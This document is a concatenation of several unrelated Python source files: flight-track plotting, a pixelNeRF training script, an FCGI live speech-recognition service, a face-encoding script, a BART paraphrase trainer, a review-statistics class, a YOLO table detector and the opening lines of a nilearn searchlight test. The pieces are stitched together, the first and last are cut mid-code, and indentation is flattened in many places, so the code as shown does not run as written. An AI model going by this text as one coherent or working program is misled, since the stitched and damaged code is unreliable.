fig0.add_subplot(1, 1, 1)
ax = Axes3D(fig0)
ax.plot(df_cruise.lat, df_cruise.lon, df_cruise.baroaltitude)
ax.scatter(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, df_cruise.iloc[0].baroaltitude, c='r', marker='>')
ax.set_xlabel("latitude")
ax.set_ylabel("longitude")
ax.set_zlabel("altitude")
ax.set_zlim(0, highest_altitude)
# plt.title("the track of flight: %s" % df_cruise.callsign.iloc[0])
# fig0.savefig('%s-track.eps' % df_cruise.callsign.iloc[0], format='eps')
# plot the relative attribute to improve analysis
fig1 = plt.figure()
fig1.add_subplot(2, 2, 1)
plt.plot(df_cruise.time, df_cruise.velocity, '-')
plt.xlabel("time")
plt.ylabel("velocity")
plt.title("(a)")
fig1.add_subplot(2, 2, 2)
plt.plot(df_cruise.time, df_cruise.heading, '-')
plt.xlabel("time")
plt.ylabel('heading')
plt.title("(b)")
fig1.add_subplot(2, 2, 3)
plt.plot(df_cruise.time, df_cruise.geoaltitude, '-')
plt.xlabel("time")
plt.ylabel('geoaltitude')
plt.title("(c)")
fig1.add_subplot(2, 2, 4)
plt.plot(df_cruise.time, df_cruise.vertrate, '-')
plt.xlabel("time")
plt.ylabel('vertrate')
plt.title("(d)")
# fig1.suptitle("Characteristic Analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig1.savefig('%s-characteristics.eps' % df_cruise.callsign.iloc[0], format='eps')
# # plot the neighbor airspace density
# time_range = 1 # control the cycle amount to analyze
# for i in range(time_range):
# fig2 = plt.figure()
# count = 1
# for t in df_cruise.time[20 * i:20 * (i + 1)]:
# fig2.add_subplot(4, 5, count)
#
# df_density = df.loc[df.time == t]
# plt.scatter(df_density.lat, df_density.lon)
# plt.plot(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, 'r+')
# plt.xlabel("latitude")
# plt.xlim(df_cruise.iloc[0].lat - 5, df_cruise.iloc[0].lat + 5)
# plt.ylabel("longitude")
# plt.ylim(df_cruise.iloc[0].lon - 5, df_cruise.iloc[0].lon + 5)
# plt.title("(%s)" % count)
# count += 1
# fig2.suptitle("spatial relevance analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig2.savefig('%s-density-%i-cycle.eps' % (df_cruise.callsign.iloc[0], i),format='eps',dpi=1000)
pieces = 1 # the record point
separation = 10 # time separation (time: pieces*seperation*10)
fig2 = plt.figure()
# plt.subplots_adjust(wspace=1, hspace=.3)
while pieces < 21:
df_density = df.loc[df.time == df_cruise.time.iloc[pieces * separation]]
fig2.add_subplot(4, 5, pieces)
plt.scatter(df_density.lat, df_density.lon)
plt.plot(df_cruise.iloc[0].lat, df_cruise.iloc[0].lon, 'r+')
if pieces > 14:
plt.xlabel("latitude")
plt.xlim(df_cruise.iloc[0].lat - 5, df_cruise.iloc[0].lat + 5)
plt.ylabel("longitude")
plt.ylim(df_cruise.iloc[0].lon - 5, df_cruise.iloc[0].lon + 5)
plt.title("(%s)" % pieces)
pieces += 1
# fig2.suptitle("spatial relevance analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig2.savefig('%s-density.eps' % (df_cruise.callsign.iloc[0]), format='eps')
# loop control
# limit the amount of flights
loop -= 1
if loop <= 0:
break
plt.show()
|
the-stack_0_19805 | # Training to a set of multiple objects (e.g. ShapeNet or DTU)
# tensorboard logs available in logs/<expname>
import sys
import os
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "src"))
)
import warnings
import trainlib
from model import make_model, loss
from render import NeRFRenderer
from data import get_split_dataset
import util
import numpy as np
import torch.nn.functional as F
import torch
from dotmap import DotMap
def extra_args(parser):
parser.add_argument(
"--batch_size", "-B", type=int, default=4, help="Object batch size ('SB')"
)
parser.add_argument(
"--nviews",
"-V",
type=str,
default="1",
help="Number of source views (multiview); put multiple (space delim) to pick randomly per batch ('NV')",
)
parser.add_argument(
"--category",
type=str,
default="plant",
help="CO3D Dataset class",
)
parser.add_argument(
"--freeze_enc",
action="store_true",
default=None,
help="Freeze encoder weights and only train MLP",
)
parser.add_argument(
"--no_bbox_step",
type=int,
default=100000,
help="Step to stop using bbox sampling",
)
parser.add_argument(
"--fixed_test",
action="store_true",
default=None,
help="Freeze encoder weights and only train MLP",
)
return parser
args, conf = util.args.parse_args(extra_args, training=True, default_ray_batch_size=128)
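# Example launch (sketch; the dataset path is a placeholder and the -n/-c/-D
# flags are assumed to come from util.args.parse_args, matching the usual
# pixel-nerf CLI):
#   python train/train.py -n sn64 -c conf/exp/sn64.conf -D /data/NMR_Dataset -V 1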
device = util.get_cuda(args.gpu_id[0])
if args.dataset_format == "co3d":
dset, val_dset, _ = get_split_dataset(args.dataset_format, args.datadir, category=args.category)
else:
dset, val_dset, _ = get_split_dataset(args.dataset_format, args.datadir)
print(
"dset z_near {}, z_far {}, lindisp {}".format(dset.z_near, dset.z_far, dset.lindisp)
)
net = make_model(conf["model"]).to(device=device)
net.stop_encoder_grad = args.freeze_enc
if args.freeze_enc:
print("Encoder frozen")
net.encoder.eval()
renderer = NeRFRenderer.from_conf(conf["renderer"], lindisp=dset.lindisp,).to(
device=device
)
# Parallize
render_par = renderer.bind_parallel(net, args.gpu_id).eval()
nviews = list(map(int, args.nviews.split()))
class PixelNeRFTrainer(trainlib.Trainer):
def __init__(self):
super().__init__(net, dset, val_dset, args, conf["train"], device=device)
self.renderer_state_path = "%s/%s/_renderer" % (
self.args.checkpoints_path,
self.args.name,
)
self.lambda_coarse = conf.get_float("loss.lambda_coarse")
self.lambda_fine = conf.get_float("loss.lambda_fine", 1.0)
print(
"lambda coarse {} and fine {}".format(self.lambda_coarse, self.lambda_fine)
)
self.rgb_coarse_crit = loss.get_rgb_loss(conf["loss.rgb"], True)
fine_loss_conf = conf["loss.rgb"]
if "rgb_fine" in conf["loss"]:
print("using fine loss")
fine_loss_conf = conf["loss.rgb_fine"]
self.rgb_fine_crit = loss.get_rgb_loss(fine_loss_conf, False)
if args.resume:
if os.path.exists(self.renderer_state_path):
renderer.load_state_dict(
torch.load(self.renderer_state_path, map_location=device)
)
self.z_near = dset.z_near
self.z_far = dset.z_far
self.use_bbox = args.no_bbox_step > 0
def post_batch(self, epoch, batch):
renderer.sched_step(args.batch_size)
def extra_save_state(self):
torch.save(renderer.state_dict(), self.renderer_state_path)
def calc_losses(self, data, is_train=True, global_step=0):
if "images" not in data:
return {}
all_images = data["images"].to(device=device) # (SB, NV, 3, H, W)
SB, NV, _, H, W = all_images.shape
all_poses = data["poses"].to(device=device) # (SB, NV, 4, 4)
all_bboxes = data.get("bbox") # (SB, NV, 4) cmin rmin cmax rmax
all_focals = data["focal"] # (SB)
all_c = data.get("c") # (SB)
if self.use_bbox and global_step >= args.no_bbox_step:
self.use_bbox = False
print(">>> Stopped using bbox sampling @ iter", global_step)
if not is_train or not self.use_bbox:
all_bboxes = None
all_rgb_gt = []
all_rays = []
curr_nviews = nviews[torch.randint(0, len(nviews), ()).item()]
if curr_nviews == 1:
image_ord = torch.randint(0, NV, (SB, 1))
else:
image_ord = torch.empty((SB, curr_nviews), dtype=torch.long)
for obj_idx in range(SB):
if all_bboxes is not None:
bboxes = all_bboxes[obj_idx]
images = all_images[obj_idx] # (NV, 3, H, W)
poses = all_poses[obj_idx] # (NV, 4, 4)
focal = all_focals[obj_idx]
c = None
if "c" in data:
c = data["c"][obj_idx]
if curr_nviews > 1:
# Somewhat inefficient, don't know better way
image_ord[obj_idx] = torch.from_numpy(
np.random.choice(NV, curr_nviews, replace=False)
)
images_0to1 = images * 0.5 + 0.5
cam_rays = util.gen_rays(
poses, W, H, focal, self.z_near, self.z_far, c=c
) # (NV, H, W, 8)
rgb_gt_all = images_0to1
rgb_gt_all = (
rgb_gt_all.permute(0, 2, 3, 1).contiguous().reshape(-1, 3)
) # (NV, H, W, 3)
if all_bboxes is not None:
pix = util.bbox_sample(bboxes, args.ray_batch_size)
pix_inds = pix[..., 0] * H * W + pix[..., 1] * W + pix[..., 2]
else:
pix_inds = torch.randint(0, NV * H * W, (args.ray_batch_size,))
rgb_gt = rgb_gt_all[pix_inds] # (ray_batch_size, 3)
rays = cam_rays.view(-1, cam_rays.shape[-1])[pix_inds].to(
device=device
) # (ray_batch_size, 8)
all_rgb_gt.append(rgb_gt)
all_rays.append(rays)
all_rgb_gt = torch.stack(all_rgb_gt) # (SB, ray_batch_size, 3)
all_rays = torch.stack(all_rays) # (SB, ray_batch_size, 8)
image_ord = image_ord.to(device)
src_images = util.batched_index_select_nd(
all_images, image_ord
) # (SB, NS, 3, H, W)
src_poses = util.batched_index_select_nd(all_poses, image_ord) # (SB, NS, 4, 4)
all_bboxes = all_poses = all_images = None
net.encode(
src_images,
src_poses,
all_focals.to(device=device),
c=all_c.to(device=device) if all_c is not None else None,
)
render_dict = DotMap(render_par(all_rays, want_weights=True,))
coarse = render_dict.coarse
fine = render_dict.fine
using_fine = len(fine) > 0
loss_dict = {}
rgb_loss = self.rgb_coarse_crit(coarse.rgb, all_rgb_gt)
loss_dict["rc"] = rgb_loss.item() * self.lambda_coarse
if using_fine:
fine_loss = self.rgb_fine_crit(fine.rgb, all_rgb_gt)
rgb_loss = rgb_loss * self.lambda_coarse + fine_loss * self.lambda_fine
loss_dict["rf"] = fine_loss.item() * self.lambda_fine
loss = rgb_loss
if is_train:
loss.backward()
loss_dict["t"] = loss.item()
return loss_dict
def train_step(self, data, global_step):
return self.calc_losses(data, is_train=True, global_step=global_step)
def eval_step(self, data, global_step):
renderer.eval()
losses = self.calc_losses(data, is_train=False, global_step=global_step)
renderer.train()
return losses
def vis_step(self, data, global_step, idx=None):
if "images" not in data:
return {}
if idx is None:
batch_idx = np.random.randint(0, data["images"].shape[0])
else:
print(idx)
batch_idx = idx
images = data["images"][batch_idx].to(device=device) # (NV, 3, H, W)
poses = data["poses"][batch_idx].to(device=device) # (NV, 4, 4)
focal = data["focal"][batch_idx : batch_idx + 1] # (1)
c = data.get("c")
if c is not None:
c = c[batch_idx : batch_idx + 1] # (1)
NV, _, H, W = images.shape
cam_rays = util.gen_rays(
poses, W, H, focal, self.z_near, self.z_far, c=c
) # (NV, H, W, 8)
images_0to1 = images * 0.5 + 0.5 # (NV, 3, H, W)
curr_nviews = nviews[torch.randint(0, len(nviews), (1,)).item()]
views_src = np.sort(np.random.choice(NV, curr_nviews, replace=False))
view_dest = np.random.randint(0, NV - curr_nviews)
for vs in range(curr_nviews):
view_dest += view_dest >= views_src[vs]
views_src = torch.from_numpy(views_src)
# set renderer net to eval mode
renderer.eval()
source_views = (
images_0to1[views_src]
.permute(0, 2, 3, 1)
.cpu()
.numpy()
.reshape(-1, H, W, 3)
)
gt = images_0to1[view_dest].permute(1, 2, 0).cpu().numpy().reshape(H, W, 3)
with torch.no_grad():
test_rays = cam_rays[view_dest] # (H, W, 8)
test_images = images[views_src] # (NS, 3, H, W)
net.encode(
test_images.unsqueeze(0),
poses[views_src].unsqueeze(0),
focal.to(device=device),
c=c.to(device=device) if c is not None else None,
)
test_rays = test_rays.reshape(1, H * W, -1)
render_dict = DotMap(render_par(test_rays, want_weights=True))
coarse = render_dict.coarse
fine = render_dict.fine
using_fine = len(fine) > 0
alpha_coarse_np = coarse.weights[0].sum(dim=-1).cpu().numpy().reshape(H, W)
rgb_coarse_np = coarse.rgb[0].cpu().numpy().reshape(H, W, 3)
depth_coarse_np = coarse.depth[0].cpu().numpy().reshape(H, W)
if using_fine:
alpha_fine_np = fine.weights[0].sum(dim=1).cpu().numpy().reshape(H, W)
depth_fine_np = fine.depth[0].cpu().numpy().reshape(H, W)
rgb_fine_np = fine.rgb[0].cpu().numpy().reshape(H, W, 3)
print("c rgb min {} max {}".format(rgb_coarse_np.min(), rgb_coarse_np.max()))
print(
"c alpha min {}, max {}".format(
alpha_coarse_np.min(), alpha_coarse_np.max()
)
)
alpha_coarse_cmap = util.cmap(alpha_coarse_np) / 255
depth_coarse_cmap = util.cmap(depth_coarse_np) / 255
vis_list = [
*source_views,
gt,
depth_coarse_cmap,
rgb_coarse_np,
alpha_coarse_cmap,
]
vis_coarse = np.hstack(vis_list)
vis = vis_coarse
if using_fine:
print("f rgb min {} max {}".format(rgb_fine_np.min(), rgb_fine_np.max()))
print(
"f alpha min {}, max {}".format(
alpha_fine_np.min(), alpha_fine_np.max()
)
)
depth_fine_cmap = util.cmap(depth_fine_np) / 255
alpha_fine_cmap = util.cmap(alpha_fine_np) / 255
vis_list = [
*source_views,
gt,
depth_fine_cmap,
rgb_fine_np,
alpha_fine_cmap,
]
vis_fine = np.hstack(vis_list)
vis = np.vstack((vis_coarse, vis_fine))
rgb_psnr = rgb_fine_np
else:
rgb_psnr = rgb_coarse_np
psnr = util.psnr(rgb_psnr, gt)
vals = {"psnr": psnr}
print("psnr", psnr)
# set the renderer network back to train mode
renderer.train()
return vis, vals
trainer = PixelNeRFTrainer()
trainer.start()
|
the-stack_0_19808 | #!/usr/bin/python3
# Copyright (C) 2020 Intel Corporation
from html import escape
from urllib.parse import parse_qs
from flup.server.fcgi import WSGIServer
import subprocess
import json
import base64
import os
import time
import sys
import wave
import datetime
import numpy as np
import ctypes
import inferservice_python as rt_api
import socket
import grpc
import struct
import service_runtime_health_monitor_pb2
import service_runtime_health_monitor_pb2_grpc
import threading, queue
from threading import Lock,Thread,Event
import logging
import logging.handlers
import syslog as syslogger
TARGET_CHANNELS = [0] #[0, 1]
TARGET_SAMPLE_RATE = 16000
FRAMES_PER_BUFFER = int(80000)  # 5 s of audio at TARGET_SAMPLE_RATE (16 kHz)
INT16_INFO = np.iinfo(np.int16)
syslog = logging.handlers.SysLogHandler(address=('localhost', 514), facility='user', socktype=socket.SOCK_DGRAM)
msgfmt = '%(asctime)s {0} %(name)s[%(process)d]: %(message)s'.format(socket.gethostname())
formatter = logging.Formatter(msgfmt, datefmt='%b %d %H:%M:%S')
syslog.setFormatter(formatter)
logger = logging.getLogger(os.path.basename(sys.argv[0]))
logger.addHandler(syslog)
logger.setLevel(logging.DEBUG)
L = []
stop = Event()
q = queue.Queue()
gAsrInit = Event()
gInitStatus = 0
def get_default_gateway():
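    # /proc/net/route: the default route has destination 00000000 and the
    # RTF_GATEWAY flag (0x2) set; the gateway column is little-endian hex.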
with open("/proc/net/route") as proc_route:
for line in proc_route:
items = line.strip().split()
if items[1] != '00000000' or not int(items[3], 16) & 2:
continue
return socket.inet_ntoa(struct.pack("<L", int(items[2], 16)))
return None
def scale_volume(np_data):
volume = 1 # by default volume is at 100%
np_data *= volume * INT16_INFO.max # scale from float [-1, 1] to int16 range
if volume != 1:
np.clip(np_data, INT16_INFO.min, INT16_INFO.max, np_data)
return np_data
def asr_thread():
global gInitStatus
    try:
        import soundcard
    except Exception as err:
        gInitStatus = 1
        gAsrInit.set()
        return  # end this worker thread; exit() here would only raise SystemExit in the thread
speech = np.zeros((10,), dtype = np.short)
sampwidth = 2
model_xml = './models/lspeech_s5_ext/FP32/speech_lib.cfg'
buf = np.zeros((100 * 100), dtype = np.int8)
utt_res = rt_api.vectorChar(buf)
device = 'CPU'
default_mic = soundcard.default_microphone()
syslogger.syslog("def mic is: %s" %(default_mic.name))
mode = 1
res = rt_api.live_asr(mode, speech, int(sampwidth), model_xml, device, utt_res)
gAsrInit.set()
with default_mic.recorder(TARGET_SAMPLE_RATE, channels=TARGET_CHANNELS, blocksize=512) as mic:
while not stop.is_set():
mic_data = mic.record(FRAMES_PER_BUFFER)
mic_data = scale_volume(mic_data)
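            # NUL-fill the shared result buffer before this decode pass writes into it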
for j in range(100*100):
utt_res[j] = '\u0000'
mode = 2
res = rt_api.live_asr(mode, mic_data, int(sampwidth), model_xml, device, utt_res)
utt_str = ''.join(utt_res)
q.put(utt_str.split('\u0000')[0])
#syslogger.syslog("output utt is: %s" %(utt_str.split('\u0000')[0]))
mode = 0
for j in range(100*100):
utt_res[j] = '\u0000'
res = rt_api.live_asr(mode, speech, int(sampwidth), model_xml, device, utt_res)
def get_result(environ):
start_time = time.time()
try:
request_body_size = int(environ.get('CONTENT_LENGTH', 0))
    except ValueError:
request_body_size = 0
data = environ["wsgi.input"].read(request_body_size)
d = dict((k, v[0]) for k, v in parse_qs(data).items())
healthcheck = d.get(b'healthcheck')
if healthcheck and int(healthcheck) == 1:
healthcheck_str = "healthcheck ok"
return healthcheck_str
s_mode = d.get(b'mode')
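    # mode protocol (from the handlers below): 0 = start the live ASR worker
    # thread, 1 = pop the next recognized utterance, 2 = stop the worker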
res = 0
if int(s_mode) == 0:
        syslogger.syslog('AI-Service-Framework: start asr thread')
if os.environ.get("PULSE_SERVER") == None:
            monitor_server_addr = get_default_gateway()
            if monitor_server_addr == None:
                res = 2
            else:
                try:
                    os.environ["no_proxy"] = monitor_server_addr + ",localhost"
                    with grpc.insecure_channel(monitor_server_addr + ':8082') as channel:
                        stub = service_runtime_health_monitor_pb2_grpc.MonitorStub(channel)
                        resp = stub.get_pulse_server_addr(service_runtime_health_monitor_pb2.Empty())
                        if resp.status != 0:
                            res = 2
else:
os.environ["PULSE_SERVER"] = resp.addr
except Exception as e:
res = 2
if (res == 0):
global gInitStatus
gInitStatus = 0
gAsrInit.clear()
stop.clear()
p = Thread(target=asr_thread, daemon=True)
p.start()
gAsrInit.wait()
if gInitStatus != 0:
p.join()
res = 2
utt = 'Starting live asr failure!'
else:
L.append(p)
utt = 'Starting live asr ok!'
if int(s_mode) == 1:
utt = q.get()
syslogger.syslog("fcgi get is: %s" %(utt))
if int(s_mode) == 2:
stop.set()
if len(L) > 0:
p = L[0]
p.join()
L.remove(p)
utt = 'Stop live asr ok!'
if res == 0:
logger.info('AI-Service-Framework: local inference')
ie_dict = {}
ie_dict["text"] = utt
result_dict = {}
result_dict["ret"] = 0
result_dict["msg"] = "ok"
result_dict["data"] = ie_dict
server_running_time = round(time.time() - start_time, 3)
result_dict["time"] = server_running_time
result_json = json.dumps(result_dict, indent = 1)
elif res == 1:
logger.info('AI-Service-Framework: remote inference')
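        # NOTE: 'urlinfo' below is not defined anywhere in this file; since
        # 'res' is never set to 1 above, this remote-inference branch is
        # effectively dead code as written.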
result_text = ("{" + urlinfo.response.split("{", 1)[1])
result_dict = json.loads(result_text)
server_running_time = round(time.time() - start_time, 3)
result_dict['time'] = server_running_time
result_json = json.dumps(result_dict, indent = 1)
result_json = str(result_json).encode('utf-8').decode('unicode_escape').encode('utf-8')
else:
syslogger.syslog('AI-Service-Framework: inference error')
result_dict = {}
result_dict["ret"] = 1
if res == 2:
result_dict["msg"] = "The pulse server ip is error, try again after os fully bootup!"
else:
result_dict["msg"] = "inference failed"
result_json = json.dumps(result_dict, indent = 1)
logger.info('AI-Service-Framework: can not get inference results')
return result_json
def application(environ, start_response):
result = get_result(environ)
    # WSGI requires bytes; get_result may return either str or bytes
    body = result if isinstance(result, bytes) else result.encode('utf-8')
status = '200 OK'
headers = [('Content-Type', 'text/plain')]
start_response(status, headers)
return [body]
if __name__ == '__main__':
WSGIServer(application).run()
|
the-stack_0_19809 | # USAGE
# When encoding on laptop, desktop, or GPU (slower, more accurate):
# python encode_faces.py --dataset dataset --encodings encodings.pickle --detection-method cnn
# When encoding on Raspberry Pi (faster, less accurate):
# python encode_faces.py --dataset dataset --encodings encodings.pickle --detection-method hog
# import the necessary packages
from imutils import paths
import face_recognition
import argparse
import pickle
import cv2
import os
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--dataset", required=True,
help="path to input directory of faces + images")
ap.add_argument("-e", "--encodings", required=True,
help="path to serialized db of facial encodings")
ap.add_argument("-d", "--detection-method", type=str, default="cnn",
help="face detection model to use: either `hog` or `cnn`")
args = vars(ap.parse_args())
# grab the paths to the input images in our dataset
print("[INFO] quantifying faces...")
imagePaths = list(paths.list_images(args["dataset"]))
# initialize the list of known encodings and known names
knownEncodings = []
knownNames = []
# loop over the image paths
for (i, imagePath) in enumerate(imagePaths):
# extract the person name from the image path
print("[INFO] processing image {}/{}".format(i + 1,
len(imagePaths)))
name = imagePath.split(os.path.sep)[-2]
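	# (assumes the dataset/<person_name>/<image> folder layout used by
	# the usage examples above)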
# load the input image and convert it from RGB (OpenCV ordering)
# to dlib ordering (RGB)
image = cv2.imread(imagePath)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input image
boxes = face_recognition.face_locations(rgb,
model=args["detection_method"])
# compute the facial embedding for the face
encodings = face_recognition.face_encodings(rgb, boxes)
# loop over the encodings
for encoding in encodings:
# add each encoding + name to our set of known names and
# encodings
knownEncodings.append(encoding)
knownNames.append(name)
# dump the facial encodings + names to disk
print("[INFO] serializing encodings...")
data = {"encodings": knownEncodings, "names": knownNames}
f = open(args["encodings"], "wb")
f.write(pickle.dumps(data))
f.close() |
the-stack_0_19812 | import os
from datetime import datetime
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
from simpletransformers.seq2seq import Seq2SeqModel, Seq2SeqArgs
from utils import load_data, clean_unnecessary_spaces
logging.basicConfig(level=logging.INFO)
transformers_logger = logging.getLogger("transformers")
transformers_logger.setLevel(logging.ERROR)
# Google Data
train_df = pd.read_csv("data/train.tsv", sep="\t").astype(str)
eval_df = pd.read_csv("data/dev.tsv", sep="\t").astype(str)
train_df = train_df.loc[train_df["label"] == "1"]
eval_df = eval_df.loc[eval_df["label"] == "1"]
train_df = train_df.rename(
columns={"sentence1": "input_text", "sentence2": "target_text"}
)
eval_df = eval_df.rename(
columns={"sentence1": "input_text", "sentence2": "target_text"}
)
train_df = train_df[["input_text", "target_text"]]
eval_df = eval_df[["input_text", "target_text"]]
train_df["prefix"] = "paraphrase"
eval_df["prefix"] = "paraphrase"
# MSRP Data
train_df = pd.concat(
[
train_df,
load_data("data/msr_paraphrase_train.txt", "#1 String", "#2 String", "Quality"),
]
)
eval_df = pd.concat(
[
eval_df,
load_data("data/msr_paraphrase_test.txt", "#1 String", "#2 String", "Quality"),
]
)
# Quora Data
# The Quora Dataset is not separated into train/test, so we do it manually the first time.
df = load_data(
"data/quora_duplicate_questions.tsv", "question1", "question2", "is_duplicate"
)
q_train, q_test = train_test_split(df)
q_train.to_csv("data/quora_train.tsv", sep="\t")
q_test.to_csv("data/quora_test.tsv", sep="\t")
# The code block above only needs to be run once.
# After that, the two lines below are sufficient to load the Quora dataset.
# q_train = pd.read_csv("data/quora_train.tsv", sep="\t")
# q_test = pd.read_csv("data/quora_test.tsv", sep="\t")
train_df = pd.concat([train_df, q_train])
eval_df = pd.concat([eval_df, q_test])
train_df = train_df[["prefix", "input_text", "target_text"]]
eval_df = eval_df[["prefix", "input_text", "target_text"]]
train_df = train_df.dropna()
eval_df = eval_df.dropna()
train_df["input_text"] = train_df["input_text"].apply(clean_unnecessary_spaces)
train_df["target_text"] = train_df["target_text"].apply(clean_unnecessary_spaces)
eval_df["input_text"] = eval_df["input_text"].apply(clean_unnecessary_spaces)
eval_df["target_text"] = eval_df["target_text"].apply(clean_unnecessary_spaces)
print(train_df)
model_args = Seq2SeqArgs()
model_args.eval_batch_size = 64
model_args.evaluate_during_training = True
model_args.evaluate_during_training_steps = 2500
model_args.evaluate_during_training_verbose = True
model_args.fp16 = False
model_args.learning_rate = 5e-5
model_args.max_seq_length = 128
model_args.num_train_epochs = 2
model_args.overwrite_output_dir = True
model_args.reprocess_input_data = True
model_args.save_eval_checkpoints = False
model_args.save_steps = -1
model_args.train_batch_size = 8
model_args.use_multiprocessing = False
model_args.do_sample = True
model_args.num_beams = None
model_args.num_return_sequences = 3
model_args.max_length = 128
model_args.top_k = 50
model_args.top_p = 0.95
model_args.wandb_project = "Paraphrasing with BART"
model = Seq2SeqModel(
encoder_decoder_type="bart",
encoder_decoder_name="facebook/bart-large",
args=model_args,
)
model.train_model(train_df, eval_data=eval_df)
to_predict = [
prefix + ": " + str(input_text)
for prefix, input_text in zip(eval_df["prefix"].tolist(), eval_df["input_text"].tolist())
]
truth = eval_df["target_text"].tolist()
preds = model.predict(to_predict)
# Saving the predictions if needed
os.makedirs("predictions", exist_ok=True)
with open(f"predictions/predictions_{datetime.now()}.txt", "w") as f:
for i, text in enumerate(eval_df["input_text"].tolist()):
f.write(str(text) + "\n\n")
f.write("Truth:\n")
f.write(truth[i] + "\n\n")
f.write("Prediction:\n")
for pred in preds[i]:
f.write(str(pred) + "\n")
f.write(
"________________________________________________________________________________\n"
)
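# A minimal inference-only sketch (assumption: the run above kept the
# simpletransformers default best_model_dir of "outputs/best_model"):
#
#   trained = Seq2SeqModel(
#       encoder_decoder_type="bart",
#       encoder_decoder_name="outputs/best_model",
#       args=model_args,
#   )
#   print(trained.predict(["paraphrase: The weather is nice today."]))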
|
the-stack_0_19813 | import math
class Stats:
@staticmethod
def get_recomendations(reviews):
recomendation = {'polecam': 0, 'nie_polecam': 0}
for review in reviews:
if review['recomendation'] == 'Polecam':
recomendation['polecam'] += 1
else:
recomendation['nie_polecam'] += 1
return recomendation
@staticmethod
def get_ratings(reviews):
        score = {'0,5': 0, '1': 0, '1,5': 0, '2': 0, '2,5': 0, '3': 0, '3,5': 0, '4': 0, '4,5': 0, '5': 0}
for review in reviews:
rating = review['score'].split('/')[0]
score[rating] += 1
return score
@staticmethod
def calculate_stats(reviews):
stats = {}
stats['number_of_opinions'] = len(reviews)
number_of_props = 0
number_of_cons = 0
sum_of_ratings = 0
for review in reviews:
number_of_props += review['props']
number_of_cons += review['cons']
sum_of_ratings += float(review['score'].split('/')[0].replace(',', '.'))
stats['number_of_props'] = number_of_props
stats['number_of_cons'] = number_of_cons
stats['mean_rating'] = round(sum_of_ratings / len(reviews), 2)
return stats
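
# Minimal usage sketch (not part of the original module). The review dicts
# below are hypothetical, but follow the keys the methods above expect:
# 'recomendation', 'score' (e.g. '4,5/5'), and 'props'/'cons' counts.
if __name__ == '__main__':
    sample_reviews = [
        {'recomendation': 'Polecam', 'score': '4,5/5', 'props': 3, 'cons': 1},
        {'recomendation': 'Nie polecam', 'score': '2/5', 'props': 0, 'cons': 4},
    ]
    print(Stats.get_recomendations(sample_reviews))  # {'polecam': 1, 'nie_polecam': 1}
    print(Stats.get_ratings(sample_reviews))
    print(Stats.calculate_stats(sample_reviews))     # mean_rating == 3.25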
|
the-stack_0_19814 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 9 23:11:51 2020
table detect with yolo
@author: chineseocr
"""
import cv2
import numpy as np
from config import tableModelDetectPath
from utils import nms_box, letterbox_image, rectangle
tableDetectNet = cv2.dnn.readNetFromDarknet(tableModelDetectPath.replace('.weights', '.cfg'), tableModelDetectPath)
def table_detect(img, sc=(416, 416), thresh=0.5, NMSthresh=0.3):
"""
    Table detection.
    img: BGR image (OpenCV ordering)
"""
scale = sc[0]
img_height, img_width = img.shape[:2]
inputBlob, fx, fy = letterbox_image(img[..., ::-1], (scale, scale))
    inputBlob = cv2.dnn.blobFromImage(inputBlob, scalefactor=1.0, size=(scale, scale), swapRB=True, crop=False)
tableDetectNet.setInput(inputBlob / 255.0)
outputName = tableDetectNet.getUnconnectedOutLayersNames()
outputs = tableDetectNet.forward(outputName)
class_ids = []
confidences = []
boxes = []
for output in outputs:
for detection in output:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > thresh:
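                # YOLO coords are normalized to the letterboxed input; map
                # back to original image coordinates via the letterbox factors fx, fy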
center_x = int(detection[0] * scale / fx)
center_y = int(detection[1] * scale / fy)
width = int(detection[2] * scale / fx)
height = int(detection[3] * scale / fy)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
if class_id == 1:
class_ids.append(class_id)
confidences.append(float(confidence))
xmin, ymin, xmax, ymax = left, top, left + width, top + height
xmin = max(xmin, 1)
ymin = max(ymin, 1)
xmax = min(xmax, img_width - 1)
ymax = min(ymax, img_height - 1)
boxes.append([xmin, ymin, xmax, ymax])
boxes = np.array(boxes)
confidences = np.array(confidences)
if len(boxes) > 0:
boxes, confidences = nms_box(boxes, confidences, score_threshold=thresh, nms_threshold=NMSthresh)
boxes, adBoxes = fix_table_box_for_table_line(boxes, confidences, img)
return boxes, adBoxes, confidences
def point_in_box(p, box):
x, y = p
xmin, ymin, xmax, ymax = box
    if xmin <= x <= xmax and ymin <= y <= ymax:
return True
else:
return False
def fix_table_box_for_table_line(boxes, confidences, img):
    # Adjust (pad) the detected table boxes before table-line detection
h, w = img.shape[:2]
n = len(boxes)
adBoxes = []
for i in range(n):
prob = confidences[i]
xmin, ymin, xmax, ymax = boxes[i]
        padx = (xmax - xmin) * (1 - prob)
        pady = (ymax - ymin) * (1 - prob)
xminNew = max(xmin - padx, 1)
yminNew = max(ymin - pady, 1)
xmaxNew = min(xmax + padx, w)
ymaxNew = min(ymax + pady, h)
adBoxes.append([xminNew, yminNew, xmaxNew, ymaxNew])
return boxes, adBoxes
if __name__ == '__main__':
import time
import argparse
    parser = argparse.ArgumentParser(description='table to excel demo')
    parser.add_argument('--tableSize', default='416,416', type=str, help="input size for table detection")
    parser.add_argument('--jpgPath', default='img/table-detect.jpg', type=str, help="path to the test image")
    args = parser.parse_args()
    args.tableSize = [int(x) for x in args.tableSize.split(',')]
img = cv2.imread(args.jpgPath)
t = time.time()
    boxes, adBoxes, scores = table_detect(img, sc=args.tableSize, thresh=0.5, NMSthresh=0.3)
print(time.time() - t, boxes, adBoxes, scores)
img = rectangle(img, adBoxes)
img.save('img/table-detect.png')
|
the-stack_0_19816 | """
Test the searchlight module
"""
# Author: Alexandre Abraham
# License: simplified BSD
import numpy as np
import nibabel
from nilearn.decoding import searchlight
def test_searchlight():
# Create a toy dataset to run searchlight on
    # Initialize with 5x5x5 scans of random values on 30 frames
rand = np.random.RandomState(0)
frames = 30
data = rand.rand(5, 5, 5, frames)
